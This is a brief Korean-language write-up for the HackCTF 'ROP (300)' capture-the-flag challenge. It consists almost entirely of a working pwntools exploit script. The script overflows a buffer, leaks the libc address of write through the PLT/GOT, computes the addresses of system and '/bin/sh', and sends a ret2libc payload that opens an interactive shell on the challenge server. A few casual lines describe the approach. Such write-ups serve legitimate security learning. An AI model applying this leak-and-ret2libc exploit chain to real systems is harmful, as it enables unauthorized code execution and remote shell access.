[HackCTF] ROP (300) write-up

걍 x86 ROP임 슥삭 하면됨

1. Exploit

from pwn import *

p = remote('ctf.j0n9hyun.xyz', 3021)
#p = process('./rop')
e = ELF('./rop')
#libc = e.libc
libc = ELF('libc.so.6')

write_plt = e.plt['write']
write_got = e.got['write']
pppr = 0x08048509

payload = "A" * (0x88 + 4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
payload += p32(e.symbols['main'])

p.sendline(payload)

write_addr = u32(p.recv(4))
log.success(hex(write_addr))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()

payload = "A" * (0x88 + 4)
payload += p32(system_addr)
payload += "AAAA"
payload += p32(binsh)

p.sendline(payload)

p.interactive()

 

libc가 그냥 주어져 있길래 write 함수로 libc 주소 leak 해서 그걸로 system 함수랑 binsh 주소 찾아서 그걸로 RTL 하면 됨